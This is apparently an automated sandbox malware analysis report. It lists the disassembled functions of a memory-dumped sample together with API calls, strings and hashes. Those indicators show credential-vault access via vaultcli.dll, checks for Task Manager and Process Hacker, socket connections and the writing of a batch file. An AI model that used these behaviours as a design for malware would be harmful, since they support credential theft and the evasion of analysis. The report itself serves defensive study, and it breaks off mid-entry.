                                                                            • Instruction Fuzzy Hash: 59F0A7B5784304BAEB509B46DC46FDB3BBC9755B04F200079BA05B11C2D2B49A45952C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041046E Relevance: 7.7, APIs: 5, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recv
                                                                            • String ID:
                                                                            • API String ID: 1507349165-0
                                                                            • Opcode ID: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                                                            • Instruction ID: a997fb7a83d2290818e28b31fbf57bc7f8b037a2cfd84f52b4588474c50995db
                                                                            • Opcode Fuzzy Hash: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                                                            • Instruction Fuzzy Hash: 8961D871904218EEDB10CF95CC45BEFB7B9BF04304F00816AF945BB281D7B9A985CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040F086 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 90sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00412155: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                                                              • Part of subcall function 00412155: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                                                              • Part of subcall function 00412155: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004121C1
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • Sleep.KERNEL32(000003E8), ref: 0040F193
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$CloseCreateDispatcherExceptionFirstFreeHandleProcess32SleepSnapshotToolhelp32UserVirtual
                                                                            • String ID: ProcessHacker.exe$TASKmgr.exe$explorer.exe$regedit.exe
                                                                            • API String ID: 1262619635-2180853415
                                                                            • Opcode ID: cde1bf2012f518953154dd03a6652405606b31095ca48fa773f12743569a33e4
                                                                            • Instruction ID: 1100a8f027d8646bfe9cbc7498619969e67dd2afa5e15d5111ff53f3380e378b
                                                                            • Opcode Fuzzy Hash: cde1bf2012f518953154dd03a6652405606b31095ca48fa773f12743569a33e4
                                                                            • Instruction Fuzzy Hash: 6321C471D053516BC724FF21C946AAFB6949F84759F040A3EF844733C2EA7CAE09C69A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004103B9 Relevance: 7.6, APIs: 5, Instructions: 70networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 004103D3
                                                                            • gethostbyname.WS2_32(?), ref: 004103DC
                                                                            • htons.WS2_32(?), ref: 00410400
                                                                            • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 00410431
                                                                            • connect.WS2_32(00000000,?,00000010), ref: 0041044A
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InetNtopconnectgethostbynamehtonssocket
                                                                            • String ID:
                                                                            • API String ID: 2393792429-0
                                                                            • Opcode ID: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                                                            • Instruction ID: 727c1264bc9e30e98f597feacc0b668f5efde6c0f62ffec738b6da8cc58ee6c9
                                                                            • Opcode Fuzzy Hash: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                                                            • Instruction Fuzzy Hash: 851103B2900258BBE71097A4AC4AFEB7BBCEF05724F008476FD55D7191E6B4894487A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041221F Relevance: 7.5, APIs: 5, Instructions: 44processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041223D
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412252
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041226A
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00412275
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00412286
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 1789362936-0
                                                                            • Opcode ID: 7c51ae1583fb216e303a586e611b021214649dc21615591d09c98e01ade8ed9e
                                                                            • Instruction ID: debd20abf717d3e205526d08b8a6d3eb8db8cce60d0d25a78bdd72c07f1bd50f
                                                                            • Opcode Fuzzy Hash: 7c51ae1583fb216e303a586e611b021214649dc21615591d09c98e01ade8ed9e
                                                                            • Instruction Fuzzy Hash: BE01D6312042147BCB205BA4AC4DBFE77BCAB48761F1080AAF505D2290D7B889828A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B10E Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,00000001,?,00000000,0040A897), ref: 0040B11F
                                                                            • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B12F
                                                                            • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B13D
                                                                            • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B14B
                                                                            • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B159
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                                                            • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                                                            • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                                                            • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040AD8C Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040AD9D
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADAD
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADBB
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADC9
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                                                            • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                                                            • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                                                            • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040A968 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040ACBE: LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040A98E), ref: 0040ACC6
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040AC6B
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 0040335A: lstrcmpW.KERNEL32(?,?), ref: 00403364
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrarylstrlen$DispatcherExceptionLoadUserVirtuallstrcmplstrcpy
                                                                            • String ID: 4$8$Internet Explorer
                                                                            • API String ID: 2576498667-747916358
                                                                            • Opcode ID: 987e0d1a0c0a3e8625a8e7fe41084d22952dfade2afdb797a8586cc142086e5b
                                                                            • Instruction ID: a99aea2a735c9718559e27865e5f0cd770b9fcd1e9f38770a9e7eda6b777dcf3
                                                                            • Opcode Fuzzy Hash: 987e0d1a0c0a3e8625a8e7fe41084d22952dfade2afdb797a8586cc142086e5b
                                                                            • Instruction Fuzzy Hash: 98A13D70D00219ABCF14EFA6CC869EEBB79FF04708F14442AF401B7291DB78AA55CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00410F61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RtlGetVersion$ntdll.dll
                                                                            • API String ID: 2574300362-1489217083
                                                                            • Opcode ID: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                                                            • Instruction ID: 559b4bd9e640983aade5312b2b5afba222edb0c69bc3aa9439dd4f75701b01ff
                                                                            • Opcode Fuzzy Hash: 0b4d11267f930e399cf0cd0a18d96ed91b6d59d4babc8823783d36d27fe86c1a
                                                                            • Instruction Fuzzy Hash: 16413830E0016CAADF248B55DC473FEB6B49B1A74DF0004E6E745E1691E27CCEC5CA58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004152FD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                                                            • lstrcatW.KERNEL32(?,send.db), ref: 00415345
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$DispatcherExceptionFreePathTempUserVirtuallstrcatlstrcpy
                                                                            • String ID: 5$send.db
                                                                            • API String ID: 1005844419-2022884741
                                                                            • Opcode ID: 6f2748a7ab57c544cae23041cd7314a3fdbf5af7460574273ea6893a900eae3a
                                                                            • Instruction ID: d0947e770b90053afdf585e4db67557909fa3e1f37a5b6bb773202aecca51e71
                                                                            • Opcode Fuzzy Hash: 6f2748a7ab57c544cae23041cd7314a3fdbf5af7460574273ea6893a900eae3a
                                                                            • Instruction Fuzzy Hash: 59115E71D40119ABCB10EBA1DC46FEE7BBCAF50349F00807AB405B6191EB789B468BD8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00415307 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                                                            • lstrcatW.KERNEL32(?,send.db), ref: 00415345
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$DispatcherExceptionFreePathTempUserVirtuallstrcatlstrcpy
                                                                            • String ID: 5$send.db
                                                                            • API String ID: 1005844419-2022884741
                                                                            • Opcode ID: 30474245352a8b012b952eb90b0fcc539b311df8baacde9dd35af5fe4a626525
                                                                            • Instruction ID: b9129dd2177f5d91cb3c2605560a9b03bc3764b0432bab46560860ad6b854e10
                                                                            • Opcode Fuzzy Hash: 30474245352a8b012b952eb90b0fcc539b311df8baacde9dd35af5fe4a626525
                                                                            • Instruction Fuzzy Hash: E1013C71D40119ABCB10EB61DC46FEE7BBCAF54309F00807AB505B2191EB789B468BD8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041579A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                                                            • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004157E3
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FolderFreePathVirtuallstrcat
                                                                            • String ID: ;$\Microsoft Vision\
                                                                            • API String ID: 1529938272-253167065
                                                                            • Opcode ID: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                                                            • Instruction ID: bab513efa4ed7bf9b340fce4efe21c66aceecf9db260b5e240e0963f2cc01e74
                                                                            • Opcode Fuzzy Hash: e1f543ee66d075d9957e2bbf340ec3783308addc8351dc4c6c8c35eeb8be1d21
                                                                            • Instruction Fuzzy Hash: 5F115EB1C40119AACB10EFA1DD49EEFBFB8EF19344F1041AAF505B2091DB38AB45CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004157A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                                                            • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004157E3
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FolderFreePathVirtuallstrcat
                                                                            • String ID: ;$\Microsoft Vision\
                                                                            • API String ID: 1529938272-253167065
                                                                            • Opcode ID: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                                                            • Instruction ID: 19a63838f8e1e6d763b3ca3dd868f266859aef75a557a0161fa2b0bf50ee1775
                                                                            • Opcode Fuzzy Hash: ae987deb636bde6e6a9704bff2257c3adb5749e056cb561f849882f6733134c3
                                                                            • Instruction Fuzzy Hash: D70109B1C40119AACB10EBA1DD49EEFBBBCAF18344F10416AB505A2191EB78AB45CBD4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412F0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,746CFE60,746CF560,?,?,0041306C), ref: 00412F2C
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateOpen
                                                                            • String ID: SOFTWARE\Microsoft\Control Panel\$l0A
                                                                            • API String ID: 436179556-2156092134
                                                                            • Opcode ID: 41a7bdf9e1d41e79d9f51368af4def5ee5f15e3bf49717f06ad0d9e1a1792ddf
                                                                            • Instruction ID: 1f16a589a04c443d12bfafe5dd9e5f2cbd84612a4648573e2ca0ed0d46f4e2df
                                                                            • Opcode Fuzzy Hash: 41a7bdf9e1d41e79d9f51368af4def5ee5f15e3bf49717f06ad0d9e1a1792ddf
                                                                            • Instruction Fuzzy Hash: 71E0ED76505128FE972086969D88DEB7EBCDB8A7F4F204066FA09E2101D1619E40D5F4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004133B6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,:start,?,?,00412887,00000000,?,?), ref: 004133D0
                                                                            • WriteFile.KERNEL32(00000000,?,77C30770,00000000,00000000,?,00412887,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?), ref: 004133E7
                                                                            • CloseHandle.KERNEL32(00000000,?,00412887,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?,?,?), ref: 004133EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleWrite
                                                                            • String ID: :start
                                                                            • API String ID: 1065093856-1299720186
                                                                            • Opcode ID: 3d2162933828df349b03da93c148e200b4ff5639908ee332fc5800b7b2fee1ec
                                                                            • Instruction ID: 7381dbcee1bd032b03ad7134698835e658c032dc0f213ba1ed2ce9562faf62e4
                                                                            • Opcode Fuzzy Hash: 3d2162933828df349b03da93c148e200b4ff5639908ee332fc5800b7b2fee1ec
                                                                            • Instruction Fuzzy Hash: 01E092B2105218BFE3111B99AC89DEB7A7CDB893B9F108175FA25A2190D6304E0146B8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004109ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A05
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RtlGetVersion$ntdll.dll
                                                                            • API String ID: 2574300362-1489217083
                                                                            • Opcode ID: 689f10ae6fce4d2fbcb04405c68690ba6ec8dc2e0aa7fc0cba4dbc559f6b806c
                                                                            • Instruction ID: 1834724eec8d6658835532cdcab9f2cbecedca635d1db10f1c6d2903e3c751bb
                                                                            • Opcode Fuzzy Hash: 689f10ae6fce4d2fbcb04405c68690ba6ec8dc2e0aa7fc0cba4dbc559f6b806c
                                                                            • Instruction Fuzzy Hash: 5AE0923178034856CB385B745D1BBDB7BE85F12745F4444A5E182E1280EAB8C9C2CA98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00410A3C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A54
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RtlGetVersion$ntdll.dll
                                                                            • API String ID: 2574300362-1489217083
                                                                            • Opcode ID: 83fdeb69c615f76a33d2da629a34f9320cc4150906f67b16e4d4081adeff4d7f
                                                                            • Instruction ID: 148d00e3e7ffb053b7c10c9a99ab11a5aecab5e32aa73cb5a336ee4092301f00
                                                                            • Opcode Fuzzy Hash: 83fdeb69c615f76a33d2da629a34f9320cc4150906f67b16e4d4081adeff4d7f
                                                                            • Instruction Fuzzy Hash: 43E0123068031C56CB349B71AC0AADB77B45B12745F4085E5E245E2180EAB8CDC68FD4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004121DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: IsWow64Process$kernel32
                                                                            • API String ID: 1646373207-3789238822
                                                                            • Opcode ID: cb2be5f3c5e82971b4ce5ae4e71650c09a6451caba81f111521282c3630b6e13
                                                                            • Instruction ID: 98e0a5f9caf74d9bea286be05565737d668b157ad2b0005c06096195e846ebc9
                                                                            • Opcode Fuzzy Hash: cb2be5f3c5e82971b4ce5ae4e71650c09a6451caba81f111521282c3630b6e13
                                                                            • Instruction Fuzzy Hash: 86E08C32600204FBDB14DBA0EC0AFDE7BB8EB08350B2005A9B501E2050DBB9EE00D698
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D01D Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040D02E
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D07D
                                                                              • Part of subcall function 00403507: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402BD2,?,?,00000000,exit,00000000,start), ref: 0040352C
                                                                              • Part of subcall function 0040594B: getaddrinfo.WS2_32(77C30770,00000000,00404FB9,00000000), ref: 00405998
                                                                              • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                                                              • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                                                              • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                                                              • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0040D101
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040D11E
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0040D128
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                                                            • String ID:
                                                                            • API String ID: 4195813003-0
                                                                            • Opcode ID: 41f9955962fd48e9ea245ec66b04e5d3ca09e58cb9f6d5fe03a8e1ac849ee31d
                                                                            • Instruction ID: ffd892ab46af73f70c32251edc3eb7415e86c97fd1647a449630ba4d99c917e8
                                                                            • Opcode Fuzzy Hash: 41f9955962fd48e9ea245ec66b04e5d3ca09e58cb9f6d5fe03a8e1ac849ee31d
                                                                            • Instruction Fuzzy Hash: F9319771600506BBD704EBB1CC55FAEB7ACAF04358F00423AF51AB21D1DB78AA15CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00410BBE Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
